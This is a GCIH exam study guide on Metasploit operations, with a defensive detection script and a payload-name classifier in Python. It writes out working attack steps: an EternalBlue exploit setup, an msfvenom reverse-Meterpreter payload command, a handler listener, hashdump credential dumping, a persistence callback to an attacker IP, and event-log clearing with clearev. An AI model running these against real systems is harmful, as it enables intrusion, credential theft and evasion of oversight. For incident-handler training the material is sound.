Metasploit Framework Operations
The Metasploit Framework is a powerful open-source exploitation platform widely used by penetration testers and incident handlers to identify vulnerabilities, develop exploits, and test security defenses. Understanding its operations is critical for GCIH professionals both for offensive assessment and defensive awareness.

**Core Components:** Metasploit consists of modules categorized as exploits, payloads, auxiliary modules, encoders, and post-exploitation modules. Exploits target specific vulnerabilities, payloads define what executes upon successful exploitation (e.g., reverse shells, Meterpreter sessions), auxiliary modules handle scanning and fuzzing, and encoders help evade detection.

**Password Attack Capabilities:** Metasploit provides robust password attack functionality through auxiliary modules like `auxiliary/scanner/ssh/ssh_login`, `auxiliary/scanner/smb/smb_login`, and others that perform brute-force and credential-stuffing attacks against various services. It integrates with wordlists and supports pass-the-hash techniques, allowing attackers to authenticate using NTLM hashes without cracking them.

**Meterpreter and Post-Exploitation:** Once access is gained, Meterpreter provides advanced post-exploitation capabilities including credential harvesting using modules like `hashdump` to extract password hashes, `mimikatz/kiwi` for plaintext credential extraction from memory, and token impersonation for privilege escalation.

**Framework Operations Workflow:**
1. **Reconnaissance** - Using auxiliary scanners to identify targets and services
2. **Exploitation** - Selecting and configuring appropriate exploits and payloads
3. **Post-Exploitation** - Pivoting, privilege escalation, and credential harvesting
4. **Persistence** - Establishing backdoors for continued access

**Key Commands:**
- `msfconsole` launches the interface
- `search` finds relevant modules
- `use` selects a module
- `set/show options` configures parameters
- `exploit/run` executes the attack

**Defensive Relevance:** GCIH professionals must understand Metasploit operations to recognize attack signatures, analyze incident artifacts, detect Meterpreter traffic patterns, and implement appropriate countermeasures such as network segmentation, intrusion detection rules, and credential protection mechanisms. Recognizing Metasploit-generated indicators of compromise is essential for effective incident response.
Metasploit Framework Operations: A Comprehensive Guide for GIAC GCIH
Why Metasploit Framework Operations Matter
The Metasploit Framework is one of the most widely used penetration testing and exploitation platforms in the world. For GIAC GCIH (GIAC Certified Incident Handler) candidates, understanding Metasploit is critical because it is frequently leveraged by both ethical hackers and malicious actors. As an incident handler, you must understand how attackers use Metasploit to exploit vulnerabilities, escalate privileges, and maintain persistence. Recognizing Metasploit-generated traffic, payloads, and artifacts is essential for effective detection, response, and remediation.
What is the Metasploit Framework?
The Metasploit Framework is an open-source penetration testing platform originally developed by H.D. Moore in 2003 and now maintained by Rapid7. It provides a structured environment for:
- Exploit Development and Execution: A vast library of exploits targeting known vulnerabilities across operating systems, applications, and services.
- Payload Generation and Delivery: Tools for creating and delivering payloads (the code that runs after successful exploitation).
- Post-Exploitation Activities: Modules for privilege escalation, credential harvesting, lateral movement, and maintaining access.
- Auxiliary Modules: Scanners, fuzzers, and other utilities that support reconnaissance and information gathering.
Metasploit is available in several editions: the open-source Metasploit Framework (command-line driven via msfconsole), and the commercial Metasploit Pro (with a web-based GUI and additional features).
Key Components of the Metasploit Framework
1. msfconsole
The primary interface for interacting with Metasploit. It is a command-line console that provides access to all modules, exploits, payloads, and configuration options. Most exam questions reference operations performed within msfconsole.
2. Exploits
Exploits are modules that take advantage of specific vulnerabilities in target systems. They are organized by platform and service (e.g., exploit/windows/smb/ms17_010_eternalblue). Each exploit targets a specific CVE or known weakness.
3. Payloads
Payloads are the code delivered to the target after successful exploitation. Key payload types include:
- Singles (Inline Payloads): Self-contained payloads that perform a single action (e.g., windows/exec).
- Stagers: Small payloads that set up a communication channel between the attacker and the target, then download and execute a larger payload (the stage).
- Stages: Larger payloads downloaded by stagers (e.g., Meterpreter).
- Meterpreter: An advanced, in-memory payload that provides a powerful post-exploitation shell with capabilities like file system access, process migration, screenshot capture, keylogging, pivoting, and privilege escalation. Meterpreter operates entirely in memory, making it harder to detect with traditional antivirus.
Payload naming convention: platform/type/connection_method
Example: windows/meterpreter/reverse_tcp — a Windows Meterpreter payload using a reverse TCP connection.
4. Auxiliary Modules
These are non-exploit modules used for scanning, enumeration, fuzzing, denial of service, and other tasks. Examples include port scanners, service version detectors, and brute-force login modules (e.g., auxiliary/scanner/smb/smb_version).
5. Post-Exploitation Modules
Modules used after gaining access to a target system, including:
- Credential dumping (e.g., post/windows/gather/hashdump)
- Privilege escalation (e.g., post/multi/recon/local_exploit_suggester)
- Persistence mechanisms
- Network pivoting and port forwarding
6. Encoders
Encoders transform payloads to evade signature-based detection (e.g., x86/shikata_ga_nai). They do not encrypt payloads but obfuscate them.
7. Nops
NOP (No Operation) generators create padding for payloads to ensure proper alignment during exploitation.
How Metasploit Operations Work: Step-by-Step
Step 1: Reconnaissance and Scanning
Use auxiliary modules or external tools (Nmap integration via db_nmap) to identify targets, open ports, and services.
Commands:
- db_nmap -sV -O 192.168.1.0/24
- use auxiliary/scanner/portscan/tcp
Step 2: Select an Exploit
Search for and select an appropriate exploit based on identified vulnerabilities.
Commands:
- search type:exploit name:eternalblue
- use exploit/windows/smb/ms17_010_eternalblue
- info (to view exploit details, required options, and target compatibility)
Step 3: Configure the Exploit
Set required options such as RHOSTS (target IP), RPORT (target port), and other parameters.
Commands:
- set RHOSTS 192.168.1.100
- set RPORT 445
- show options (to verify configuration)
Step 4: Select and Configure a Payload
Choose a payload compatible with the exploit and target system.
Commands:
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.50 (attacker's IP for reverse connections)
- set LPORT 4444 (attacker's listening port)
Key Concept — Reverse vs. Bind Payloads:
- Reverse payloads (reverse_tcp, reverse_https): The target connects back to the attacker. This is preferred because it bypasses firewall rules that block inbound connections to the target.
- Bind payloads (bind_tcp): The target opens a listening port and waits for the attacker to connect. This can be blocked by firewalls.
Step 5: Execute the Exploit
Commands:
- exploit or run
- exploit -j (run as a background job)
Step 6: Post-Exploitation with Meterpreter
Once a Meterpreter session is established, the attacker has extensive control:
- sysinfo — Display target system information
- getuid — Show current user context
- getsystem — Attempt privilege escalation to SYSTEM
- hashdump — Dump password hashes from the SAM database
- migrate [PID] — Migrate Meterpreter to another process (for stability and stealth)
- upload / download — Transfer files
- shell — Drop into a native command shell
- keyscan_start / keyscan_dump — Keylogging
- screenshot — Capture screenshot
- portfwd add -l 3389 -p 3389 -r [target] — Port forwarding for pivoting
- run autoroute -s 10.10.10.0/24 — Add routes for pivoting to internal networks
- background — Background the session and return to msfconsole
- sessions -l — List active sessions
- sessions -i [id] — Interact with a specific session
Step 7: Maintaining Access and Persistence
Metasploit offers persistence modules to maintain access after reboots:
- run persistence -U -i 5 -p 4444 -r [attacker IP]
- Post modules like post/windows/manage/persistence_exe
Step 8: Cleanup
Attackers cover their tracks by removing logs, artifacts, and persistence mechanisms.
- clearev — Clear Windows event logs from Meterpreter
Important Metasploit Concepts for the GCIH Exam
The Metasploit Database:
Metasploit uses a PostgreSQL database to store scan results, credentials, and session data. Commands include db_status, hosts, services, vulns, and creds.
msfvenom:
A standalone tool for generating payloads outside of msfconsole. It combines the old msfpayload and msfencode tools.
Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
This creates a standalone executable that, when run on a target, establishes a reverse Meterpreter session.
Handlers:
The exploit/multi/handler module is used to catch incoming connections from payloads generated with msfvenom or delivered through other means. This is a critical module for exam scenarios.
Setup:
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.50
- set LPORT 4444
- exploit
Session Management:
- sessions -l — List all active sessions
- sessions -i 1 — Interact with session 1
- sessions -k 1 — Kill session 1
- sessions -u 1 — Upgrade a shell session to Meterpreter
Pivoting:
Using a compromised host to access other networks. Metasploit supports pivoting through autoroute and SOCKS proxy modules. This is a key concept — attackers use pivoting to reach systems not directly accessible from their position.
Detection and Incident Handling Perspective
As an incident handler, knowing how Metasploit works helps you:
- Identify Indicators of Compromise (IOCs): Meterpreter default ports (4444), reverse TCP connections to external IPs, unusual processes, and in-memory injections.
- Recognize Metasploit artifacts: Default payload signatures, staged payload traffic patterns, and Meterpreter communication protocols (HTTP/HTTPS/TCP).
- Detect exploitation attempts: Network signatures matching known Metasploit exploit modules (many IDS/IPS systems have Metasploit-specific rules).
- Respond effectively: Understanding the attack chain helps you contain, eradicate, and recover from incidents involving Metasploit-based attacks.
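As an added example (not part of the original guide), the Python below applies the IOC bullets above to constructed connection records: it flags internal hosts that open outbound connections to an external address on Metasploit's default handler port, and fixed-interval reconnects of the kind a persistence module's retry interval (`-i 5`) produces. Internal ranges are taken as RFC 1918; the record format, the sample lines and the helper names are all constructed for this example.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

# RFC 1918 ranges count as "internal" (listed explicitly: is_private also covers documentation ranges).
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
HANDLER_PORTS = {4444}  # Metasploit's default LPORT; a weak signal alone, since it is trivially changed

# Constructed sample records: "timestamp src dst dport", one per new outbound connection.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.10.10.5 203.0.113.10 4444
2024-05-01T10:00:05 10.10.10.5 203.0.113.10 4444
2024-05-01T10:00:10 10.10.10.5 203.0.113.10 4444
2024-05-01T10:00:15 10.10.10.5 203.0.113.10 4444
2024-05-01T10:00:07 10.10.10.8 10.10.10.20 445
2024-05-01T10:01:00 10.10.10.9 198.51.100.7 443
2024-05-01T10:02:00 10.10.10.9 198.51.100.7 443
"""

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)

def parse_log(text: str):
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            records.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return records

def find_suspicious(records, min_hits: int = 3, jitter: float = 1.0):
    # Returns (src, dst, dport, reason) tuples for internal->external flows worth a look.
    findings = set()
    flows = defaultdict(list)
    for ts, src, dst, dport in records:
        if not (is_internal(src) and not is_internal(dst)):
            continue  # purely internal traffic is out of scope for this check
        flows[(src, dst, dport)].append(ts)
        if dport in HANDLER_PORTS:
            findings.add((src, dst, dport, "outbound to default Metasploit handler port"))
    for key, times in flows.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Near-constant spacing looks like an automated retry loop (persistence -i N); legitimate
        # periodic traffic such as monitoring or NTP needs an allowlist before this rule is useful.
        if len(times) >= min_hits and max(gaps) - min(gaps) <= jitter:
            findings.add(key + ("fixed-interval reconnects to external host",))
    return sorted(findings)
```

Running `find_suspicious(parse_log(SAMPLE_LOG))` reports the 10.10.10.5 flow twice (port and beacon rules) and nothing for the two-hit HTTPS flow, which is below the `min_hits` threshold.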
Common Metasploit Commands Summary for Exam Reference
- search — Find modules by name, type, CVE, or platform
- use — Select a module
- info — Display module details
- show options — Display required and optional settings
- show payloads — List compatible payloads for current exploit
- show targets — List available target configurations
- set / setg — Set local or global options
- check — Test if a target is vulnerable without exploiting
- exploit / run — Execute the module
- back — Deselect the current module
- jobs — List background jobs
- workspace — Manage database workspaces
Exam Tips: Answering Questions on Metasploit Framework Operations
1. Know the Terminology: Be precise about the difference between exploits, payloads (singles, stagers, stages), auxiliary modules, encoders, and post modules. Exam questions often test whether you can distinguish between these components.
2. Understand Payload Naming Conventions: A payload name like windows/meterpreter/reverse_tcp tells you the platform (Windows), the stage (Meterpreter), and the stager (reverse_tcp). A single slash (e.g., windows/shell_reverse_tcp) indicates a single (inline) payload, while a double-path structure indicates a staged payload.
3. Reverse vs. Bind — Know When Each is Used: Questions frequently ask about when a reverse payload is preferable. Remember: reverse payloads are used when the target is behind a firewall that blocks inbound connections. The target initiates the connection outbound to the attacker.
4. LHOST vs. RHOST: LHOST is the attacker's (local) IP address; RHOSTS is the target's (remote) IP address. Mixing these up is a common mistake on the exam. LPORT is the attacker's listening port; RPORT is the target service port.
5. Meterpreter is In-Memory: Remember that Meterpreter runs entirely in memory and does not write to disk by default, which makes it stealthy. Questions may ask about why Meterpreter is harder to detect than traditional payloads.
6. exploit/multi/handler: Know that this module is the generic listener for catching reverse connections. It is used with msfvenom-generated payloads and client-side attacks.
7. Process Migration: Understand that attackers migrate Meterpreter to a more stable, long-running process (like explorer.exe or svchost.exe) to avoid detection and survive if the initial exploited process terminates.
8. Post-Exploitation Commands: Be familiar with key Meterpreter commands: getsystem, hashdump, migrate, portfwd, autoroute, and clearev. These frequently appear in scenario-based questions.
9. Think Like an Incident Handler: Many GCIH questions frame scenarios from the defender's perspective. If a question describes unusual outbound traffic on port 4444 to an external IP, suspicious in-memory activity, or credential dumping, think Metasploit/Meterpreter.
10. Know Key Exploits by Name: Be familiar with commonly referenced Metasploit modules, especially ms17_010_eternalblue (SMB), ms08_067_netapi (SMB), and psexec (pass-the-hash). These are classic examples in the GCIH curriculum.
11. Use Process of Elimination: If an exam question presents multiple tools or frameworks, remember that Metasploit is specifically a modular exploitation framework. Don't confuse it with standalone tools like Hydra (brute-forcing), John the Ripper (password cracking), or Nmap (scanning), even though Metasploit can integrate with some of these.
12. Practice with Index Tabs: The GCIH exam is open-book. Index your course materials with tabs for Metasploit commands, payload types, Meterpreter commands, and common exploit modules so you can quickly reference them during the exam.
13. Scenario-Based Questions: Expect questions that present a command sequence or output and ask you to identify what is happening. Practice reading Metasploit console output and understanding the attack flow from exploit selection through post-exploitation.
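As an added worked example (not from the original guide and not Metasploit's own code), the Python classifier below applies the naming rules from Step 4 and from tips 2 and 3: one component after the platform means an inline (single) payload, two components mean stage plus stager, and a `reverse_` or `bind_` suffix gives the connection direction. It also skips the architecture component (`x64`, `x86`) that many real payload names carry, which the guide's shorthand omits; `classify_payload` and `expected_flow` are hypothetical helper names.

```python
import re
from dataclasses import dataclass

# Architecture component that many real payload names carry between the
# platform and the stage (e.g. windows/x64/meterpreter/reverse_tcp).
ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe"}

@dataclass
class PayloadProfile:
    platform: str
    staged: bool
    stage: str       # "meterpreter", "shell", ... for staged payloads; the single's own name otherwise
    stager: str      # "reverse_tcp", "bind_tcp", ...; "" when the payload makes no connection
    direction: str   # "reverse", "bind" or "none"
    transport: str   # "tcp", "https", ...; "none" when the payload makes no connection

def classify_payload(name: str) -> PayloadProfile:
    """Split a payload name into platform / stage / stager and derive the connection direction."""
    parts = name.split("/")
    if len(parts) < 2:
        raise ValueError(f"expected platform/...: {name!r}")
    platform = parts[0]
    rest = parts[2:] if len(parts) > 2 and parts[1] in ARCHES else parts[1:]
    if len(rest) >= 2:
        # platform/stage/stager: the stager sets up the channel, then pulls the stage
        staged, stage, stager = True, rest[0], rest[-1]
    else:
        # platform/single: one inline payload with no separate stage
        staged, stage, stager = False, rest[0], ""
    m = re.search(r"(reverse|bind)_(\w+)", rest[-1])
    direction, transport = (m.group(1), m.group(2)) if m else ("none", "none")
    if not staged and m:
        stager = m.group(0)  # e.g. the "reverse_tcp" inside "shell_reverse_tcp"
    return PayloadProfile(platform, staged, stage, stager, direction, transport)

def expected_flow(profile: PayloadProfile) -> str:
    """What a defender should expect on the wire for this payload."""
    if profile.direction == "reverse":
        return f"target initiates outbound {profile.transport} connection to LHOST:LPORT"
    if profile.direction == "bind":
        return f"target listens on LPORT; attacker connects inbound over {profile.transport}"
    return "no callback: payload acts locally (e.g. command execution)"
```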
By mastering these concepts and operational details, you will be well-prepared to answer Metasploit Framework questions on the GCIH exam with confidence and accuracy.